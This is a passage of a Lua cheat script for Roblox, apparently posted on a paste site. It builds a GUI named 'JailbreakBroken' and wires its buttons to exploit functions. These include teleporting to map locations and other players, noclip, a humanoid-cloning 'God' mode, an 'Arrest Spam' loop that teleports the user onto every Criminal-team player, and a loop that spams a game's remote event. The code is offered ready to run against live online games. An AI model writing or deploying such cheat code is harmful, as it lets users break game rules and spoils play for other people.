  1306. TextLabel_7.TextColor3 = Color3.new(1, 1, 1)
  1307. TextLabel_7.TextSize = 20
  1308. TextLabel_7.TextWrapped = true
  1309. TextLabel_7.TextXAlignment = Enum.TextXAlignment.Left
  1310. TextLabel_7.TextYAlignment = Enum.TextYAlignment.Top
  1311.  
  1312. TextLabel_8.Parent = cframe
  1313. TextLabel_8.BackgroundColor3 = Color3.new(1, 1, 1)
  1314. TextLabel_8.BackgroundTransparency = 1
  1315. TextLabel_8.BorderSizePixel = 0
  1316. TextLabel_8.Position = UDim2.new(0, 23, 0, 286)
  1317. TextLabel_8.Size = UDim2.new(0, 273, 0, 31)
  1318. TextLabel_8.Font = Enum.Font.SourceSansLight
  1319. TextLabel_8.FontSize = Enum.FontSize.Size24
  1320. TextLabel_8.Text = "V1.6 - 1.7 Player functions (God, Noclip)"
  1321. TextLabel_8.TextColor3 = Color3.new(1, 1, 1)
  1322. TextLabel_8.TextSize = 20
  1323. TextLabel_8.TextWrapped = true
  1324. TextLabel_8.TextXAlignment = Enum.TextXAlignment.Left
  1325. TextLabel_8.TextYAlignment = Enum.TextYAlignment.Top
  1326.  
  1327. TextLabel_9.Parent = cframe
  1328. TextLabel_9.BackgroundColor3 = Color3.new(1, 1, 1)
  1329. TextLabel_9.BackgroundTransparency = 1
  1330. TextLabel_9.BorderSizePixel = 0
  1331. TextLabel_9.Position = UDim2.new(0, 23, 0, 306)
  1332. TextLabel_9.Size = UDim2.new(0, 273, 0, 31)
  1333. TextLabel_9.Font = Enum.Font.SourceSansLight
  1334. TextLabel_9.FontSize = Enum.FontSize.Size24
  1335. TextLabel_9.Text = "V1.8 - 1.9 More player functions (Arrest Spam)"
  1336. TextLabel_9.TextColor3 = Color3.new(1, 1, 1)
  1337. TextLabel_9.TextSize = 20
  1338. TextLabel_9.TextWrapped = true
  1339. TextLabel_9.TextXAlignment = Enum.TextXAlignment.Left
  1340. TextLabel_9.TextYAlignment = Enum.TextYAlignment.Top
  1341.  
  1342. TextLabel_10.Parent = cframe
  1343. TextLabel_10.BackgroundColor3 = Color3.new(1, 1, 1)
  1344. TextLabel_10.BackgroundTransparency = 1
  1345. TextLabel_10.BorderSizePixel = 0
  1346. TextLabel_10.Position = UDim2.new(0, 23, 0, 327)
  1347. TextLabel_10.Size = UDim2.new(0, 273, 0, 31)
  1348. TextLabel_10.Font = Enum.Font.SourceSansLight
  1349. TextLabel_10.FontSize = Enum.FontSize.Size24
  1350. TextLabel_10.Text = "V2.0 - V2.4 New UI, drastic bug fixes"
  1351. TextLabel_10.TextColor3 = Color3.new(1, 1, 1)
  1352. TextLabel_10.TextSize = 20
  1353. TextLabel_10.TextWrapped = true
  1354. TextLabel_10.TextXAlignment = Enum.TextXAlignment.Left
  1355. TextLabel_10.TextYAlignment = Enum.TextYAlignment.Top
  1356.  
  1357. TextLabel_11.Parent = cframe
  1358. TextLabel_11.BackgroundColor3 = Color3.new(1, 1, 1)
  1359. TextLabel_11.BackgroundTransparency = 1
  1360. TextLabel_11.BorderSizePixel = 0
  1361. TextLabel_11.Position = UDim2.new(0, 23, 0, 351)
  1362. TextLabel_11.Size = UDim2.new(0, 273, 0, 42)
  1363. TextLabel_11.Font = Enum.Font.SourceSansLight
  1364. TextLabel_11.FontSize = Enum.FontSize.Size24
  1365. TextLabel_11.Text = "V2.4 - 2.5 (Current) Another new UI, player teleporting"
  1366. TextLabel_11.TextColor3 = Color3.new(1, 1, 1)
  1367. TextLabel_11.TextSize = 20
  1368. TextLabel_11.TextWrapped = true
  1369. TextLabel_11.TextXAlignment = Enum.TextXAlignment.Left
  1370. TextLabel_11.TextYAlignment = Enum.TextYAlignment.Top
  1371.  
  1372. Functions.Name = "Functions"
  1373. Functions.Parent = UI
  1374. Functions.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1375. Functions.BorderColor3 = Color3.new(1, 1, 1)
  1376. Functions.BorderSizePixel = 0
  1377. Functions.Position = UDim2.new(0, 72, 0, 219)
  1378. Functions.Size = UDim2.new(0, 175, 0, 38)
  1379. Functions.Font = Enum.Font.SourceSansLight
  1380. Functions.FontSize = Enum.FontSize.Size24
  1381. Functions.Text = "Player Functions"
  1382. Functions.TextColor3 = Color3.new(1, 1, 1)
  1383. Functions.TextSize = 20
  1384.  
  1385. Frame_18.Parent = Functions
  1386. Frame_18.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1387. Frame_18.BorderSizePixel = 0
  1388. Frame_18.Position = UDim2.new(0, 0, 0, 38)
  1389. Frame_18.Size = UDim2.new(0, 175, 0, 5)
  1390.  
  1391. Credits.Name = "Credits"
  1392. Credits.Parent = UI
  1393. Credits.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1394. Credits.BorderColor3 = Color3.new(1, 1, 1)
  1395. Credits.BorderSizePixel = 0
  1396. Credits.Position = UDim2.new(0, 72, 0, 315)
  1397. Credits.Size = UDim2.new(0, 175, 0, 38)
  1398. Credits.Font = Enum.Font.SourceSansLight
  1399. Credits.FontSize = Enum.FontSize.Size24
  1400. Credits.Text = "Credits / Changelog"
  1401. Credits.TextColor3 = Color3.new(1, 1, 1)
  1402. Credits.TextSize = 20
  1403.  
  1404. Frame_19.Parent = Credits
  1405. Frame_19.BackgroundColor3 = Color3.new(0.0823529, 0.0823529, 0.0823529)
  1406. Frame_19.BorderSizePixel = 0
  1407. Frame_19.Position = UDim2.new(0, 0, 0, 38)
  1408. Frame_19.Size = UDim2.new(0, 175, 0, 5)
  1409.  
  1410. GoBack.Name = "GoBack"
  1411. GoBack.Parent = UI
  1412. GoBack.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1413. GoBack.BackgroundTransparency = 1
  1414. GoBack.BorderColor3 = Color3.new(1, 1, 1)
  1415. GoBack.BorderSizePixel = 0
  1416. GoBack.Position = UDim2.new(0, 0, 0, 400)
  1417. GoBack.Size = UDim2.new(0, 93, 0, 38)
  1418. GoBack.Visible = false
  1419. GoBack.Font = Enum.Font.SourceSansLight
  1420. GoBack.FontSize = Enum.FontSize.Size24
  1421. GoBack.Text = "Go Back"
  1422. GoBack.TextColor3 = Color3.new(1, 1, 1)
  1423. GoBack.TextSize = 20
  1424.  
  1425. Open.Name = "Open"
  1426. Open.Parent = JailbreakBroken
  1427. Open.BackgroundColor3 = Color3.new(0.235294, 0.494118, 0.776471)
  1428. Open.BackgroundTransparency = 1
  1429. Open.BorderColor3 = Color3.new(1, 1, 1)
  1430. Open.BorderSizePixel = 0
  1431. Open.Position = UDim2.new(0, -105, 0, 632)
  1432. Open.Size = UDim2.new(0, 318, 0, 67)
  1433.  
  1434. OpenGUI.Name = "OpenGUI"
  1435. OpenGUI.Parent = Open
  1436. OpenGUI.BackgroundColor3 = Color3.new(0.101961, 0.101961, 0.101961)
  1437. OpenGUI.BorderColor3 = Color3.new(1, 1, 1)
  1438. OpenGUI.BorderSizePixel = 0
  1439. OpenGUI.Position = UDim2.new(0, 93, 0, 15)
  1440. OpenGUI.Size = UDim2.new(0, 97, 0, 38)
  1441. OpenGUI.Font = Enum.Font.SourceSansLight
  1442. OpenGUI.FontSize = Enum.FontSize.Size18
  1443. OpenGUI.Text = "Open GUI"
  1444. OpenGUI.TextColor3 = Color3.new(1, 1, 1)
  1445. OpenGUI.TextSize = 17
  1446.  
  1447. Frame_20.Parent = OpenGUI
  1448. Frame_20.BackgroundColor3 = Color3.new(0.0705882, 0.0705882, 0.0705882)
  1449. Frame_20.BorderSizePixel = 0
  1450. Frame_20.Position = UDim2.new(0, 0, 0, 38)
  1451. Frame_20.Size = UDim2.new(0, 97, 0, 5)
  1452.  
  1453. -- Teleporting
  1454. Jail.MouseButton1Click:connect(function()
  1455. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1138.66, 18.009, -1430.01) + Vector3.new(1,0,0)
  1456. end)
  1457.  
  1458. CrimBase1.MouseButton1Click:connect(function()
  1459. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-222.339157, 17.9125443, 1575.82336) + Vector3.new(1,0,0)
  1460. end)
  1461.  
  1462. CrimBase2.MouseButton1Click:connect(function()
  1463. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1579.4823, 49.787693, -1759.61438) + Vector3.new(1,0,0)
  1464. end)
  1465.  
  1466. Police.MouseButton1Click:connect(function()
  1467. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1130.11426, 17.950058, -1593.09766) + Vector3.new(1,0,0)
  1468. end)
  1469.  
  1470. Bank.MouseButton1Click:connect(function()
  1471. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-11.036747, 17.9193821, 797.971521) + Vector3.new(1,0,0)
  1472. end)
  1473.  
  1474. Helipad1.MouseButton1Click:connect(function()
  1475. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1172.01172, 59.586, -1553.929) + Vector3.new(1,0,0)
  1476. end)
  1477.  
  1478. Helipad2.MouseButton1Click:connect(function()
  1479. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(741.508, 71.005, 1136.33826) + Vector3.new(1,0,0)
  1480. end)
  1481.  
  1482. Garage.MouseButton1Click:connect(function()
  1483. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-341.0529, 19.644, 1182.502) + Vector3.new(1,0,0)
  1484. end)
  1485.  
  1486. Vault.MouseButton1Click:connect(function()
  1487. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(32.214, 2.67609, 818.648926) + Vector3.new(1,0,0)
  1488. end)
  1489.  
  1490. Jewlery.MouseButton1Click:connect(function()
  1491. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(137.325, 17.878, 1320.123) + Vector3.new(1,0,0)
  1492. end)
  1493.  
  1494. -- Player Teleporting
  1495.  
  1496. local PLR = game:GetService("Players").LocalPlayer
  1497.  
  1498. local Players = game.Players:GetPlayers()
  1499.  
  1500. local Selected1 = game.CoreGui.JailbreakBroken.UI.TPBFrame.SPlayer
  1501.  
  1502. val.Name = "Selected"
  1503.  
  1504. function alphabetize(p1, p2)
  1505. local Player1 = p1.Name:lower()
  1506. local P1 = Player1:sub(1, 1):byte()
  1507. local Player2 = p2.Name:lower()
  1508. local P2 = Player2:sub(1, 1):byte()
  1509.  
  1510.  
  1511. if P1 < P2 then return true else return false end
  1512. end
  1513. table.sort(Players, alphabetize)
  1514.  
  1515. for i = 1, #Players do
  1516. local p = Players[i]
  1517. if p ~= PLR then
  1518. local btn = Instance.new("TextButton", sframe)
  1519. btn.Name = p.Name
  1520. btn.Text = p.Name
  1521. btn.Size = UDim2.new(0, 260, 0, 25)
  1522. btn.Font = Enum.Font.Highway
  1523. btn.FontSize = Enum.FontSize.Size14
  1524. btn.TextColor3 = Color3.new(255, 255, 255)
  1525. btn.BackgroundTransparency = 1
  1526. btn.Position = UDim2.new(0, 0, 0, (i * 25) - 25)
  1527. sframe.CanvasSize = UDim2.new(0, 0, 0, (#Players * 25) - 25)
  1528. btn.MouseButton1Click:connect(function()
  1529. val.Value = p
  1530. Selected1.Text = "Player: "..p.Name
  1531. end)
  1532.  
  1533. end
  1534. end
  1535.  
  1536. function update()
  1537.  
  1538. for i, btn in ipairs(sframe:GetChildren()) do if btn:IsA("TextButton") then btn:Destroy() end end
  1539.  
  1540. local plrs = game.Players:GetPlayers()
  1541. table.sort(plrs, alphabetize)
  1542.  
  1543. for i = 1, #plrs do
  1544.  
  1545. local p = plrs[i]
  1546. if p ~= PLR then
  1547.  
  1548. local btn = Instance.new("TextButton", sframe)
  1549. btn.Text = p.Name
  1550. btn.Size = UDim2.new(0, 260, 0, 25)
  1551. btn.Font = Enum.Font.Highway
  1552. btn.FontSize = Enum.FontSize.Size14
  1553. btn.TextColor3 = Color3.new(255, 255, 255)
  1554. btn.BackgroundTransparency = 1
  1555. btn.Position = UDim2.new(0, 0, 0, (i * 25) - 25)
  1556.  
  1557. sframe.CanvasSize = UDim2.new(0, 0, 0, (#Players * 25) - 25)
  1558.  
  1559. btn.MouseButton1Click:connect(function()
  1560. val.Value = p
  1561. SPlayer.Text = "Player: "..p.Name
  1562. end)
  1563.  
  1564. end
  1565. end
  1566.  
  1567. end
  1568. game.Players.PlayerAdded:connect(update)
  1569. game.Players.PlayerRemoving:connect(update)
  1570.  
  1571. -- Functions
  1572.  
  1573. function getPlayer()
  1574. if val.Value:IsA("Player") and val.Value.Character:FindFirstChild("HumanoidRootPart") then return val.Value else return nil end
  1575. end
  1576.  
  1577. PTP.MouseButton1Click:connect(function()
  1578. local p = getPlayer()
  1579. if p then PLR.Character.HumanoidRootPart.CFrame = p.Character.HumanoidRootPart.CFrame + Vector3.new(0, 3, 0)
  1580. else PTP.Text = "404"; wait(1); PTP.Text = "TP To Player" end
  1581. end)
  1582.  
  1583. noclip = false
  1584. game:GetService('RunService').Stepped:connect(function()
  1585. if noclip then
  1586. game.Players.LocalPlayer.Character.Humanoid:ChangeState(11)
  1587. end
  1588. end)
  1589.  
  1590. Noclipp.MouseButton1Click:connect(function()
  1591. noclip = not noclip
  1592. if Noclipp.Text == "Enable Noclip" then
  1593. Noclipp.Text = "Disable Noclip"
  1594. else
  1595. Noclipp.Text = "Enable Noclip"
  1596. end
  1597. end)
  1598.  
  1599. God.MouseButton1Click:connect(function()
  1600. game.Players.LocalPlayer.Character.Humanoid.Name = 1
  1601. local l = game.Players.LocalPlayer.Character["1"]:Clone()
  1602. l.Parent = game.Players.LocalPlayer.Character
  1603. l.Name = "Humanoid"
  1604. wait(0.1)
  1605. game.Players.LocalPlayer.Character["1"]:Destroy()
  1606. game.Workspace.CurrentCamera.CameraSubject = game.Players.LocalPlayer.Character
  1607. game.Players.LocalPlayer.Character.Animate.Disabled = true
  1608. wait(0.1)
  1609. game.Players.LocalPlayer.Character.Animate.Disabled = false
  1610. game.Players.LocalPlayer.Character.Humanoid.DisplayDistanceType = "None"
  1611. end)
  1612.  
  1613. Arrest.MouseButton1Click:connect(function()
  1614. local Player = game.Players.LocalPlayer
  1615. wait(0.5)
  1616. for i,v in pairs(game.Teams.Criminal:GetPlayers()) do
  1617. repeat
  1618. wait()
  1619. Player.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 1)
  1620. until v.Team.Name ~= "Criminal"
  1621. end
  1622. end)
  1623.  
  1624.  
  1625. local frame = game.CoreGui.JailbreakBroken:WaitForChild('UI')
  1626. OpenGUI.MouseButton1Down:connect(function()
  1627. frame.Visible = not frame.Visible
  1628. if frame.Visible == true then
  1629. OpenGUI.Text = "Close GUI"
  1630. elseif
  1631. frame.Visible == false then
  1632. OpenGUI.Text = "Open GUI"
  1633. end
  1634. end)
  1635.  
  1636. Teleports.MouseButton1Click:connect(function()
  1637. game.CoreGui.JailbreakBroken.UI.TPBFrame.Visible = true
  1638. game.CoreGui.JailbreakBroken.UI.Teleports.Visible = false
  1639. game.CoreGui.JailbreakBroken.UI.Functions.Visible = false
  1640. game.CoreGui.JailbreakBroken.UI.Credits.Visible = false
  1641. game.CoreGui.JailbreakBroken.UI.GoBack.Visible = true
  1642. game.CoreGui.JailbreakBroken.UI.cframe.Visible = false
  1643. end)
  1644.  
  1645. Functions.MouseButton1Click:connect(function()
  1646. game.CoreGui.JailbreakBroken.UI.FBFrame.Visible = true
  1647. game.CoreGui.JailbreakBroken.UI.Teleports.Visible = false
  1648. game.CoreGui.JailbreakBroken.UI.Functions.Visible = false
  1649. game.CoreGui.JailbreakBroken.UI.Credits.Visible = false
  1650. game.CoreGui.JailbreakBroken.UI.GoBack.Visible = true
  1651. game.CoreGui.JailbreakBroken.UI.cframe.Visible = false
  1652. end)
  1653.  
  1654. GoBack.MouseButton1Click:connect(function()
  1655. GoBack.Visible = false
  1656. game.CoreGui.JailbreakBroken.UI.FBFrame.Visible = false
  1657. game.CoreGui.JailbreakBroken.UI.TPBFrame.Visible = false
  1658. Teleports.Visible = true
  1659. Functions.Visible = true
  1660. Credits.Visible = true
  1661. game.CoreGui.JailbreakBroken.UI.cframe.Visible = false
  1662. end)
  1663. Credits.MouseButton1Click:connect(function()
  1664. game.CoreGui.JailbreakBroken.UI.FBFrame.Visible = false
  1665. game.CoreGui.JailbreakBroken.UI.Teleports.Visible = false
  1666. game.CoreGui.JailbreakBroken.UI.Functions.Visible = false
  1667. game.CoreGui.JailbreakBroken.UI.Credits.Visible = false
  1668. game.CoreGui.JailbreakBroken.UI.GoBack.Visible = true
  1669. game.CoreGui.JailbreakBroken.UI.cframe.Visible = true
  1670. end)
  1671. end)
  1672.  
  1673. TreasureHuntSimulatorRainbow.Name = "🐇Treasure Hunt Simulator Rainbow"
  1674. TreasureHuntSimulatorRainbow.Parent = ScrollingFrame
  1675. TreasureHuntSimulatorRainbow.BackgroundColor3 = Color3.new(1, 1, 1)
  1676. TreasureHuntSimulatorRainbow.Position = UDim2.new(-0.00434782589, 0, 0.294605821, 0)
  1677. TreasureHuntSimulatorRainbow.Size = UDim2.new(0, 230, 0, 50)
  1678. TreasureHuntSimulatorRainbow.Font = Enum.Font.SourceSans
  1679. TreasureHuntSimulatorRainbow.Text = "Treasure Hunt Simulator Rainbow"
  1680. TreasureHuntSimulatorRainbow.TextColor3 = Color3.new(0.333333, 1, 1)
  1681. TreasureHuntSimulatorRainbow.TextScaled = true
  1682. TreasureHuntSimulatorRainbow.TextSize = 14
  1683. TreasureHuntSimulatorRainbow.TextWrapped = true
  1684. TreasureHuntSimulatorRainbow.MouseButton1Down:connect(function()
  1685. while wait(.1) do
  1686. game:GetService("ReplicatedStorage").Events.ChooseColor:FireServer(tostring(BrickColor.Random()))
  1687. end
  1688. end)
  1689.  
  1690. -- Scripts
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement